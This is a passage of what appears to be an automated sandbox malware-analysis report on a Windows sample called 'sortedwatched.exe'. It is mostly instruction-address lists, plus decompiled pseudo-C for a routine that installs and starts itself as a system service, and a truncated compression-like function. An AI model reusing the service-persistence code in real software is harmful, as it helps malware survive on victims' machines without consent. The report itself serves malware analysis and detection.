                  0x00405946
                  0x00405949
                  0x00405949
                  0x0040594c
                  0x0040594f
                  0x004059ca
                  0x004059d9
                  0x004059e2
                  0x004059e4
                  0x00405b8a
                  0x00405b8a
                  0x00405b8d
                  0x00000000
                  0x00405b8d
                  0x004059ea
                  0x004059ed
                  0x004059ed
                  0x004059ef
                  0x00000000
                  0x00000000
                  0x004059f5
                  0x004059f7
                  0x00000000
                  0x00000000
                  0x004059fd
                  0x00405a00
                  0x00405a28
                  0x00405a2b
                  0x00405a2b
                  0x00405a31
                  0x00405a34
                  0x00405a37
                  0x00405a3a
                  0x00405a42
                  0x00405a42
                  0x00405a45
                  0x00405a48
                  0x00405b7b
                  0x00405b7c
                  0x00405b7f
                  0x00000000
                  0x00405b7f
                  0x00405a4e
                  0x00405a50
                  0x00405a54
                  0x00405a55
                  0x00405a58
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a02
                  0x00405a02
                  0x00405a02
                  0x00405a05
                  0x00000000
                  0x00000000
                  0x00405a10
                  0x00405a12
                  0x00405a16
                  0x00405a19
                  0x00405a1b
                  0x00405a1e
                  0x00405a21
                  0x00405a24
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a26
                  0x00405b6e
                  0x00000000
                  0x00405b6e
                  0x00405951
                  0x00405953
                  0x00405994
                  0x00405994
                  0x00405997
                  0x00405b63
                  0x00000000
                  0x00405b63
                  0x0040599d
                  0x0040599f
                  0x0040599f
                  0x004059a0
                  0x004059a7
                  0x004059aa
                  0x004059ad
                  0x004059ad
                  0x00000000
                  0x004059ad
                  0x00405955
                  0x00405958
                  0x0040597f
                  0x0040597f
                  0x00405986
                  0x00405989
                  0x0040598c
                  0x0040598f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040595a
                  0x0040595a
                  0x0040595a
                  0x0040595d
                  0x00000000
                  0x00000000
                  0x00405968
                  0x0040596a
                  0x0040596b
                  0x0040596e
                  0x00405971
                  0x00405974
                  0x00405977
                  0x00000000
                  0x00000000
                  0x00405979
                  0x0040597c
                  0x00000000
                  0x0040597c
                  0x00405b58
                  0x00000000
                  0x00405b58
                  0x00404df6
                  0x00404df9
                  0x00405b3f
                  0x00405b3f
                  0x00405b42
                  0x00000000
                  0x00405b42
                  0x00404dff
                  0x00404e02
                  0x00404e68
                  0x00404e68
                  0x00404e6a
                  0x00404e6a
                  0x00404e6d
                  0x00404e70
                  0x00404f0d
                  0x00404f0d
                  0x00404f0d
                  0x00404f14
                  0x00404f17
                  0x00404f19
                  0x00404ef0
                  0x00404ef0
                  0x00404ef3
                  0x00405a87
                  0x00000000
                  0x00405a87
                  0x00404efe
                  0x00404f00
                  0x00404f01
                  0x00404f04
                  0x00404f04
                  0x00404f07
                  0x00404f0a
                  0x00000000
                  0x00404f0a
                  0x00404f1e
                  0x00404f2a
                  0x00404f30
                  0x00404f30
                  0x00404f37
                  0x00404f3a
                  0x00404f3c
                  0x00404f3e
                  0x00404f48
                  0x00404f4b
                  0x00404f4c
                  0x00000000
                  0x00404f4c
                  0x00404e84
                  0x00404e8a
                  0x00404e8d
                  0x00404e90
                  0x00404e90
                  0x00404e92
                  0x00404e92
                  0x00404e95
                  0x00404e98
                  0x00404f54
                  0x00404f5b
                  0x00404f5b
                  0x00404f5e
                  0x00404f60
                  0x004053a3
                  0x004053a3
                  0x004053a6
                  0x004053a9
                  0x004053ab
                  0x004053ae
                  0x004054e3
                  0x004054e3
                  0x004054e6
                  0x00405513
                  0x00405513
                  0x00405516
                  0x0040551d
                  0x00405525
                  0x00405528
                  0x0040552a
                  0x004055d7
                  0x004055d8
                  0x004055db
                  0x004055e3
                  0x004055e6
                  0x004055e7
                  0x004055ef
                  0x004055f2
                  0x004055f2
                  0x004055f6
                  0x004055f6
                  0x004055f9
                  0x004055fb
                  0x00405600
                  0x00405621
                  0x00405621
                  0x00405626
                  0x00405629
                  0x0040562e
                  0x00000000
                  0x00000000
                  0x00405634
                  0x0040563b
                  0x00405647
                  0x0040564a
                  0x0040564d
                  0x0040564f
                  0x00405685
                  0x00405685
                  0x00405688
                  0x004056ba
                  0x004056ba
                  0x004056bd
                  0x004056c4
                  0x004056cc
                  0x004056cf
                  0x004056d1
                  0x00405779
                  0x0040577c
                  0x00405781
                  0x00405782
                  0x0040578b
                  0x0040578d
                  0x0040578e
                  0x00405796
                  0x00405796
                  0x0040579a
                  0x0040579d
                  0x004057a0
                  0x004057a0
                  0x004057a3
                  0x004057a6
                  0x004057a6
                  0x004057a9
                  0x004057ab
                  0x004057b2
                  0x004057b9
                  0x004057bc
                  0x004057bf
                  0x004057c1
                  0x004057fa
                  0x004057fd
                  0x00405800
                  0x00405803
                  0x00405805
                  0x00405811
                  0x00405811
                  0x00405819
                  0x0040581c
                  0x00405821
                  0x00405825
                  0x00405828
                  0x0040582b
                  0x00405869
                  0x0040586c
                  0x0040586f
                  0x004058d2
                  0x004058d2
                  0x004058d5
                  0x004058d5
                  0x004058d7
                  0x004058da
                  0x004058df
                  0x004058e5
                  0x004058e8
                  0x004058ee
                  0x004058f1
                  0x004058f4
                  0x004058f4
                  0x004058f9
                  0x004058fc
                  0x004058fe
                  0x00000000
                  0x00000000
                  0x00405906
                  0x00405908
                  0x0040590b
                  0x0040590e
                  0x004058c8
                  0x004058ca
                  0x00000000
                  0x004058ca
                  0x004058bf
                  0x004058c2
                  0x004058c5
                  0x00000000
                  0x004058c5
                  0x00405871
                  0x00405874
                  0x00000000
                  0x00000000
                  0x00405876
                  0x0040587e
                  0x0040587e
                  0x00405880
                  0x00405882
                  0x00405884
                  0x00405887
                  0x0040588a
                  0x0040588d
                  0x00405890
                  0x00405890
                  0x00405897
                  0x0040589a
                  0x0040589d
                  0x004058a0
                  0x004058a3
                  0x004058a6
                  0x00000000
                  0x00000000
                  0x004058a8
                  0x004058aa
                  0x00000000
                  0x00000000
                  0x004058b0
                  0x004058b5
                  0x004058b7
                  0x004058ba
                  0x004058bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004058bd
                  0x0040582d
                  0x00405830
                  0x00405830
                  0x00405832
                  0x00405833
                  0x00405836
                  0x00405838
                  0x00000000
                  0x00000000
                  0x0040583e
                  0x00405841
                  0x00405844
                  0x00405b30
                  0x00405b31
                  0x00405b34
                  0x00000000
                  0x00405b34
                  0x0040585c
                  0x0040585f
                  0x00405862
                  0x00405864
                  0x00000000
                  0x00405864
                  0x00405807
                  0x0040580b
                  0x00405b20
                  0x00405b20
                  0x00405b23
                  0x00000000
                  0x00405b23
                  0x00000000
                  0x0040580b
                  0x004057e2
                  0x004057e2
                  0x004057e4
                  0x004057c5
                  0x004057c5
                  0x004057c8
                  0x00405b15
                  0x00000000
                  0x00405b15
                  0x004057d3
                  0x004057d5
                  0x004057d6
                  0x004057d9
                  0x004057d9
                  0x004057dc
                  0x004057df
                  0x00000000
                  0x004057df
                  0x004057e9
                  0x004057f1
                  0x004057f4
                  0x004057f4
                  0x004057f4
                  0x004057f7
                  0x00000000
                  0x004057f7
                  0x004056d9
                  0x004056dc
                  0x00000000
                  0x004056dc
                  0x0040568f
                  0x00405692
                  0x0040574b
                  0x00405763
                  0x00405768
                  0x0040576b
                  0x0040576e
                  0x00405771
                  0x00000000
                  0x00405771
                  0x00405698
                  0x004056a0
                  0x004056a8
                  0x004056ab
                  0x004056ad
                  0x004056e6
                  0x004056e9
                  0x0040571e
                  0x0040571e
                  0x00405721
                  0x00405b0a
                  0x00000000
                  0x00405b0a
                  0x0040572c
                  0x0040572e
                  0x00405732
                  0x00405735
                  0x00405737
                  0x0040573a
                  0x0040573d
                  0x00405740
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405746
                  0x004056ed
                  0x004056ee
                  0x004056f1
                  0x00405700
                  0x0040570b
                  0x0040570c
                  0x0040570f
                  0x00405712
                  0x00405714
                  0x00000000
                  0x00000000
                  0x00405716
                  0x0040571a
                  0x0040571c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040571c
                  0x00000000
                  0x004056f1
                  0x004056af
                  0x004056b2
                  0x004056b4
                  0x00000000
                  0x00000000
                  0x004056b6
                  0x004056b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004056b8
                  0x00405670
                  0x00405670
                  0x00405672
                  0x00405653
                  0x00405653
                  0x00405656
                  0x00405aff
                  0x00000000
                  0x00405aff
                  0x00405661
                  0x00405663
                  0x00405664
                  0x00405667
                  0x00405667
                  0x0040566a
                  0x0040566d
                  0x00000000
                  0x0040566d
                  0x00405677
                  0x0040567f
                  0x00405682
                  0x00405682
                  0x00405682
                  0x00000000
                  0x00405682
                  0x00405607
                  0x00405607
                  0x0040560a
                  0x0040560d
                  0x00405af0
                  0x00405af1
                  0x00405af4
                  0x00000000
                  0x00405af4
                  0x00405613
                  0x00405615
                  0x00405615
                  0x00405616
                  0x00405616
                  0x00000000
                  0x00405616
                  0x00405532
                  0x00405535
                  0x0040553a
                  0x00000000
                  0x0040553a
                  0x004054e8
                  0x004054eb
                  0x004055bf
                  0x004055c4
                  0x004055c7
                  0x004055ca
                  0x004055cd
                  0x00000000
                  0x004055cd
                  0x004054f1
                  0x004054f9
                  0x00405501
                  0x00405504
                  0x00405506
                  0x00405542
                  0x00405545
                  0x0040557a
                  0x0040557a
                  0x0040557d
                  0x00405ae3
                  0x00000000
                  0x00405ae3
                  0x00405588
                  0x0040558a
                  0x0040558e
                  0x00405591
                  0x00405593
                  0x00405596
                  0x00405599
                  0x0040559c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004055a2
                  0x00405549
                  0x0040554a
                  0x0040554d
                  0x0040555c
                  0x00405567
                  0x00405568
                  0x0040556b
                  0x0040556e
                  0x00405570
                  0x00000000
                  0x00000000
                  0x00405572
                  0x00405576
                  0x00405578
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405578
                  0x00000000
                  0x0040554d
                  0x00405508
                  0x0040550b
                  0x0040550d
                  0x00000000
                  0x00000000
                  0x0040550f
                  0x00405511
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405511
                  0x004053bc
                  0x004053bd
                  0x004053c0
                  0x00000000
                  0x00000000
                  0x004053c6
                  0x004053c9
                  0x004053f4
                  0x004053cb
                  0x004053e1
                  0x004053e6
                  0x004053e9
                  0x004053ec
                  0x004053ef
                  0x004053ef
                  0x004053fc
                  0x00405404
                  0x00405407
                  0x00405409
                  0x00405414
                  0x00405415
                  0x00405418
                  0x00405420
                  0x00405423
                  0x00405424
                  0x0040542c
                  0x0040542f
                  0x0040542f
                  0x00000000
                  0x0040540b
                  0x0040540d
                  0x00405433
                  0x00405433
                  0x00405436
                  0x00405438
                  0x0040543d
                  0x00000000
                  0x00000000
                  0x00405443
                  0x00405446
                  0x00405471
                  0x00405448
                  0x0040545e
                  0x00405463
                  0x00405466
                  0x00405469
                  0x0040546c
                  0x0040546c
                  0x00405479
                  0x00405481
                  0x00405484
                  0x00405486
                  0x00405491
                  0x00405492
                  0x00405495
                  0x004054a2
                  0x004054a7
                  0x004054a8
                  0x004054ab
                  0x004054b3
                  0x004054b6
                  0x004054b6
                  0x00000000
                  0x00405488
                  0x0040548a
                  0x004054ba
                  0x004054bd
                  0x004054bf
                  0x004054c7
                  0x004054c9
                  0x004054ca
                  0x004054cf
                  0x0040561e
                  0x0040561e
                  0x0040561e
                  0x00000000
                  0x0040561e
                  0x004054d5
                  0x004054d8
                  0x004054db
                  0x00000000
                  0x004054db
                  0x00405486
                  0x00405409
                  0x00404f75
                  0x00404f7f
                  0x00404f95
                  0x00404fab
                  0x00404fb1
                  0x00404fb4
                  0x00404fb6
                  0x00404fb9
                  0x00404fbd
                  0x00404fd7
                  0x00404fd7
                  0x00404fdb
                  0x00404fdd
                  0x00404fe3
                  0x00404fe3
                  0x00404fe3
                  0x00404feb
                  0x00404fec
                  0x00404fec
                  0x00404ff5
                  0x00404ff8
                  0x00404ffa
                  0x00405001
                  0x00405004
                  0x00405004
                  0x00405009
                  0x0040500f
                  0x0040501d
                  0x0040501d
                  0x00405020
                  0x00405024
                  0x00405027
                  0x0040502c
                  0x0040516a
                  0x0040516a
                  0x0040516e
                  0x0040539b
                  0x0040539b
                  0x00000000
                  0x0040539b
                  0x00405174
                  0x00405174
                  0x00405176
                  0x0040517c
                  0x0040517f
                  0x00405181
                  0x00405361
                  0x00405363
                  0x00405ad2
                  0x00405ad5
                  0x00405ad5
                  0x00405ad8
                  0x00000000
                  0x00405ad8
                  0x00405377
                  0x00405388
                  0x00405388
                  0x00405392
                  0x00405398
                  0x00000000
                  0x00405398
                  0x00405187
                  0x0040518a
                  0x0040518d
                  0x004051bf
                  0x004051bf
                  0x004051c2
                  0x004051c9
                  0x004051d1
                  0x004051d4
                  0x004051d6
                  0x00405283
                  0x00405284
                  0x00405287
                  0x0040528f
                  0x00405292
                  0x00405293
                  0x0040529b
                  0x0040529e
                  0x0040529e
                  0x004052a2
                  0x004052a5
                  0x004052a7
                  0x004052a9
                  0x004052ac
                  0x004052af
                  0x004052b2
                  0x004052b5
                  0x004052ca
                  0x004052d6
                  0x004052d6
                  0x004052dd
                  0x004052e0
                  0x004052e2
                  0x00405308
                  0x0040530b
                  0x00405310
                  0x00405317
                  0x0040531a
                  0x0040531d
                  0x00405324
                  0x00405326
                  0x00405329
                  0x0040532c
                  0x0040532f
                  0x0040533b
                  0x0040533b
                  0x00405331
                  0x00405331
                  0x00405331
                  0x00405347
                  0x00405350
                  0x00405353
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004052e4
                  0x004052e4
                  0x004052e4
                  0x004052e7
                  0x00000000
                  0x00000000
                  0x004052f2
                  0x004052f4
                  0x004052f5
                  0x004052f8
                  0x004052fb
                  0x004052fe
                  0x00405301
                  0x00405303
                  0x00000000
                  0x00000000
                  0x00405305
                  0x00000000
                  0x00405305
                  0x00405ac7
                  0x00000000
                  0x00405ac7
                  0x004052cc
                  0x004052d0
                  0x00405ab9
                  0x00405ab9
                  0x00405abc
                  0x00000000
                  0x00405abc
                  0x00000000
                  0x004052d0
                  0x004052b7
                  0x004052bd
                  0x004052c4
                  0x00000000
                  0x004052c4
                  0x004051de
                  0x004051e6
                  0x00000000
                  0x004051e6
                  0x00405194
                  0x00405197
                  0x0040526b
                  0x00405270
                  0x00405273
                  0x00405276
                  0x00405279
                  0x00000000
                  0x00405279
                  0x0040519d
                  0x004051a5
                  0x004051ad
                  0x004051b0
                  0x004051b2
                  0x004051ee
                  0x004051f1
                  0x00405226
                  0x00405226
                  0x00405229
                  0x00405aae
                  0x00000000
                  0x00405aae
                  0x00405234
                  0x00405236
                  0x0040523a
                  0x0040523d
                  0x0040523f
                  0x00405242
                  0x00405245
                  0x00405248
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040524e
                  0x004051f5
                  0x004051f6
                  0x004051f9
                  0x00405208
                  0x00405213
                  0x00405214
                  0x00405217
                  0x0040521a
                  0x0040521c
                  0x00000000
                  0x00000000
                  0x0040521e
                  0x00405222
                  0x00405224
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405224
                  0x00000000
                  0x004051f9
                  0x004051b4
                  0x004051b7
                  0x004051b9
                  0x00000000
                  0x00000000
                  0x004051bb
                  0x004051bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004051bd
                  0x00405032
                  0x00405035
                  0x00405038
                  0x0040503a
                  0x0040503e
                  0x00405041
                  0x00405043
                  0x00000000
                  0x00000000
                  0x00405049
                  0x00405050
                  0x00405056
                  0x0040505d
                  0x00405067
                  0x00405069
                  0x0040506b
                  0x0040506c
                  0x0040506f
                  0x0040506f
                  0x00405073
                  0x00405076
                  0x00405079
                  0x004050c6
                  0x004050cb
                  0x004050d3
                  0x004050d6
                  0x004050d8
                  0x004050dd
                  0x004050e0
                  0x004050e3
                  0x004050eb
                  0x004050eb
                  0x004050ee
                  0x004050f1
                  0x004050f1
                  0x004050f4
                  0x004050f7
                  0x004050fa
                  0x00405143
                  0x0040514b
                  0x0040514b
                  0x0040514e
                  0x00000000
                  0x004050fc
                  0x004050fc
                  0x004050ff
                  0x004050ff
                  0x00405102
                  0x00405105
                  0x00405105
                  0x00405112
                  0x00405117
                  0x0040511b
                  0x0040511e
                  0x00405137
                  0x00405120
                  0x00405123
                  0x00405126
                  0x0040512c
                  0x00405132
                  0x00405132
                  0x0040513a
                  0x0040513a
                  0x0040513a
                  0x0040513d
                  0x00405140
                  0x00000000
                  0x00405140
                  0x004050fa
                  0x00405085
                  0x00405088
                  0x0040508e
                  0x00000000
                  0x00000000
                  0x0040509a
                  0x0040509d
                  0x004050a2
                  0x004050a2
                  0x004050a7
                  0x004050aa
                  0x004050aa
                  0x004050ad
                  0x004050af
                  0x004050b1
                  0x004050b1
                  0x004050b9
                  0x00405156
                  0x00405156
                  0x00405159
                  0x0040515a
                  0x0040515a
                  0x00405164
                  0x00405167
                  0x00405167
                  0x00000000
                  0x00405167
                  0x00405014
                  0x00405017
                  0x00405a9d
                  0x00405aa0
                  0x00405aa0
                  0x00405aa3
                  0x00000000
                  0x00405aa3
                  0x00000000
                  0x00405017
                  0x00404fbf
                  0x00404fc2
                  0x00404fc6
                  0x00404fcd
                  0x00404fce
                  0x00404fce
                  0x00404fd4
                  0x00404fd4
                  0x00000000
                  0x00404fd4
                  0x00404e9e
                  0x00404ea1
                  0x00404ecb
                  0x00404ecb
                  0x00404ed4
                  0x00404ed7
                  0x00404eda
                  0x00404edd
                  0x00404ee0
                  0x00404ee3
                  0x00404eed
                  0x00000000
                  0x00404eed
                  0x00404ea3
                  0x00404ea6
                  0x00404ea6
                  0x00404ea6
                  0x00404ea9
                  0x00000000
                  0x00000000
                  0x00404eb4
                  0x00404eb6
                  0x00404eb7
                  0x00404eba
                  0x00404ebd
                  0x00404ec0
                  0x00404ec3
                  0x00000000
                  0x00000000
                  0x00404ec5
                  0x00404ec8
                  0x00000000
                  0x00404ec8
                  0x00405a92
                  0x00000000
                  0x00405a92
                  0x00404e06
                  0x00404e08
                  0x00404e0b
                  0x00404e14
                  0x00404e1e
                  0x00404e24
                  0x00404e2b
                  0x00404e32
                  0x00404e37
                  0x00404e49
                  0x00404e4a
                  0x00404e4a
                  0x00404e4c
                  0x00404e54
                  0x00404e5a
                  0x00404e60
                  0x00000000
                  0x00404e60
                  0x00404d1e
                  0x00404d1e
                  0x00404d1f
                  0x00000000
                  0x00000000
                  0x00404d26
                  0x00404d26
                  0x00404d27
                  0x00405c30
                  0x00000000
                  0x00405c30
                  0x00404d2d
                  0x00404d2d
                  0x00404d2e
                  0x00405c63
                  0x00000000
                  0x00405c63
                  0x00404d34
                  0x00404d34
                  0x00404d37
                  0x00000000
                  0x00000000
                  0x00404d3d
                  0x00404d3d
                  0x00404d3e
                  0x00405a3f
                  0x00000000
                  0x00405a3f
                  0x00404d44
                  0x00404d45
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404d4b
                  0x00404ccf
                  0x00000000
                  0x00000000
                  0x00404cd5
                  0x00404cd5
                  0x00404cd8
                  0x00000000
                  0x00000000
                  0x00404cde
                  0x00404cde
                  0x00404cdf
                  0x00000000
                  0x00000000
                  0x00404ce5
                  0x00404ce5
                  0x00404ce6
                  0x00000000
                  0x00000000
                  0x00404cec
                  0x00404cec
                  0x00404cef
                  0x00000000
                  0x00000000
                  0x00404cf6
                  0x00404cf6
                  0x00404cf7
                  0x00000000
                  0x00000000
                  0x00404cfd
                  0x00404cfd
                  0x00404cfe
                  0x00000000
                  0x00000000
                  0x00404d04
                  0x00404d05
                  0x00000000
                  0x00000000
                  0x00404d0b
                  0x00404d0b
                  0x00404d0e
                  0x00000000
                  0x00404d0e
                  0x00404b80
                  0x00405604
                  0x00000000
                  0x00405604
                  0x00404b86
                  0x00404b89
                  0x00404c8c
                  0x00404c8c
                  0x00404c8f
                  0x00000000
                  0x00000000
                  0x00404c95
                  0x00404c95
                  0x00404c98
                  0x00000000
                  0x00000000
                  0x00404c9f
                  0x00404c9f
                  0x00404ca0
                  0x00000000
                  0x00000000
                  0x00404ca6
                  0x00404ca6
                  0x00404ca7
                  0x00000000
                  0x00000000
                  0x00404cad
                  0x00404cad
                  0x00404cae
                  0x00000000
                  0x00000000
                  0x00404cb4
                  0x00404cb4
                  0x00404cb7
                  0x00000000
                  0x00000000
                  0x00404cbe
                  0x00404cbf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404cc5
                  0x00404b8f
                  0x00000000
                  0x00000000
                  0x00404b98
                  0x00000000
                  0x00000000
                  0x00404b9e
                  0x00000000
                  0x00404ba5
                  0x00404ba8
                  0x00404baa
                  0x00404bad
                  0x00404baf
                  0x00404bb2
                  0x00404bb5
                  0x00404bb8
                  0x00404bbb
                  0x00404bbe
                  0x00404bc1
                  0x00404bc4
                  0x00404bca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404bd0
                  0x00404bd0
                  0x00404bd3
                  0x00404bd7
                  0x00404be6
                  0x00404be7
                  0x00000000
                  0x00404be7
                  0x00404bd9
                  0x00404bdc
                  0x00000000
                  0x00000000
                  0x00404bec
                  0x00404bef
                  0x00404bef
                  0x00404bf1
                  0x00404c0a
                  0x00404c0e
                  0x00404c11
                  0x00404c14
                  0x00404c1c
                  0x00404c1f
                  0x00404c24
                  0x00404c2e
                  0x00404c30
                  0x00404c47
                  0x00404c47
                  0x00404c4a
                  0x00404c4c
                  0x00404c4c
                  0x00404c50
                  0x00404c53
                  0x00404c7c
                  0x00404c7c
                  0x00404c7f
                  0x00404c81
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404c87
                  0x00404c5b
                  0x00404c5d
                  0x00404c63
                  0x00404c74
                  0x00404c74
                  0x00404c77
                  0x00404c77
                  0x00404c77
                  0x00404c79
                  0x00000000
                  0x00404c79
                  0x00404c69
                  0x00404c6b
                  0x00404c6c
                  0x00404c6e
                  0x00000000
                  0x00000000
                  0x00404c70
                  0x00000000
                  0x00404c70
                  0x00404c32
                  0x00404c36
                  0x00000000
                  0x00000000
                  0x00404c3c
                  0x00404c3e
                  0x00000000
                  0x00000000
                  0x00404c40
                  0x00404c43
                  0x00000000
                  0x00404c43
                  0x00404bf3
                  0x00404bf5
                  0x00404bf6
                  0x00404bf9
                  0x00404bfb
                  0x00404bfc
                  0x00404c00
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a5d
                  0x00000000
                  0x00000000
                  0x00404b9e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$_memset
                  • String ID: $0HCw
                  • API String ID: 805054810-431550929
                  • Opcode ID: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction ID: 0f27d5521e96fbc1980188426f25ed571c9babf91149ddb257576a03cfef0b11
                  • Opcode Fuzzy Hash: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction Fuzzy Hash: 59D25D71E0461ADBDB18CFA9C9906AEBBB1FF49300F14416AD955F7380D738AA41CF98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F7A0, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 84serviceUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E0040F7A0() {
				char _v8;
				short _v528;
				void* _t24;
				int _t32;
				void* _t33;
				void* _t35;

				_t32 = 0;
				_v8 = 0;
				_t24 = OpenSCManagerW(0, 0, 0xf003f);
				if(_t24 != 0) {
					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
					 *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t33);
					L00401B09(_t34);
					_t35 = CreateServiceW(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0);
					if(_t35 != 0) {
						if(E0040F504(_t24,  &_v8) != 0) {
							 *0x41353c(_t35, 1, _v8);
							E00401532(_v8);
						}
					} else {
						_t35 = OpenServiceW(_t24, "sortedwatched", 0x10);
					}
					if(_t35 != 0) {
						_t32 = StartServiceW(_t35, _t32, _t32);
						CloseServiceHandle(_t35);
					}
					E0040F6D0(_t24);
					CloseServiceHandle(_t24);
				}
				return _t32;
			}









                  0x0040f7ab
                  0x0040f7b4
                  0x0040f7bd
                  0x0040f7c1
                  0x0040f7d7
                  0x0040f7eb
                  0x0040f7f6
                  0x0040f81c
                  0x0040f820
                  0x0040f840
                  0x0040f848
                  0x0040f851
                  0x0040f851
                  0x0040f822
                  0x0040f830
                  0x0040f830
                  0x0040f858
                  0x0040f864
                  0x0040f866
                  0x0040f866
                  0x0040f86e
                  0x0040f874
                  0x0040f87a
                  0x0040f882

                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000104), ref: 0040F7B7
                  • _snwprintf.NTDLL ref: 0040F7EB
                  • CreateServiceW.ADVAPI32(00000000,sortedwatched,sortedwatched,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F816
                  • OpenServiceW.ADVAPI32(00000000,sortedwatched,00000010), ref: 0040F82A
                  • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,0040F111), ref: 0040F848
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040F85D
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F866
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F874
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 2587423728-1568575355
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00402F82, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 416UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00402F82(void* __ecx) {
				int _v8;
				int _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				char _v356;
				void _v676;
				int _t269;
				signed char _t283;
				signed char _t287;
				signed char _t291;
				signed int _t294;
				signed char _t297;
				signed int _t298;
				signed char _t301;
				signed char _t310;
				int _t336;
				int _t337;
				signed char _t341;
				signed char _t342;
				signed char _t343;
				void* _t344;
				void* _t345;
				signed char _t346;
				signed char _t347;
				signed char _t348;
				signed char* _t349;
				signed char* _t350;
				signed char _t351;
				signed char* _t352;
				signed char* _t353;
				signed char* _t354;
				signed char* _t355;
				signed char* _t356;
				intOrPtr _t358;
				intOrPtr _t360;
				char _t361;
				intOrPtr _t362;
				char _t364;
				intOrPtr _t366;
				intOrPtr _t368;
				void* _t374;
				void* _t375;
				signed int _t377;
				signed char _t379;
				int _t381;
				void* _t383;
				signed int _t385;
				void* _t387;
				void* _t388;
				signed int _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;

				_v20 = 0xff;
				_t383 = __ecx;
				 *((short*)(__ecx + 0x8392)) = 1;
				E00402D85(__ecx, 0, 0x120, 0xf, 0);
				E00402D85(__ecx, 1, 0x20, 0xf, 0);
				_t392 = _t391 + 0x18;
				_t336 = 0x11e;
				while( *((char*)(_t383 + _t336 + 0x8f11)) == 0) {
					_t336 = _t336 - 1;
					if(_t336 > 0x101) {
						continue;
					}
					break;
				}
				_v16 = _t336;
				_t269 = 0x1e;
				while( *((char*)(_t383 + _t269 + 0x9031)) == 0) {
					_t269 = _t269 - 1;
					if(_t269 > 1) {
						continue;
					}
					break;
				}
				_v32 = _t269;
				memcpy( &_v676, _t383 + 0x8f12, _t336);
				memcpy( &_v676 + _t336, _t383 + 0x9032, _v32);
				_t337 = 0;
				_v36 = _v32 + _t336;
				_v12 = 0;
				_v8 = 0;
				memset(_t383 + 0x8612, 0, 0x26);
				_t393 = _t392 + 0x24;
				_v28 = 0;
				if(_v36 > 0) {
					_t310 = _v20;
					do {
						_t379 =  *((intOrPtr*)(_t390 + _v28 - 0x2a0));
						_v24 = _t379;
						if(_t379 != 0) {
							_t358 = _v12;
							if(_t358 != 0) {
								if(_t358 >= 3) {
									if(_t358 > 0xa) {
										 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
										_t364 = _t358 - 0xb;
										 *(_t390 + _t337 - 0x160) = 0x12;
									} else {
										 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
										_t364 = _t358 - 3;
										 *(_t390 + _t337 - 0x160) = 0x11;
									}
									 *((char*)(_t390 + _t337 - 0x15f)) = _t364;
									_t337 = _t337 + 2;
								} else {
									 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t358;
